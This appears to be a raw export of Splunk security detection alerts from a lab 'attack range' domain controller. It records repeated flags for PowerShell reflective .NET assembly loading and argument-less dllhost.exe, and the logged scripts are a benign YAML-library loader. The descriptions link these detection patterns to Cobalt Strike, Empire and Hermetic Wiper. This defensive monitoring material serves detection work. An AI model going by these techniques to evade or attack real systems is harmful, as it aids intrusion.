Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T01:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T01:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664931600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664931600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6032", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664931600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664931600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1790", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664934932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664934932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664934932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664934932, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T00:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T00:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664928000, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664928000", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="4856", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664931331, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T23:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T23:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in 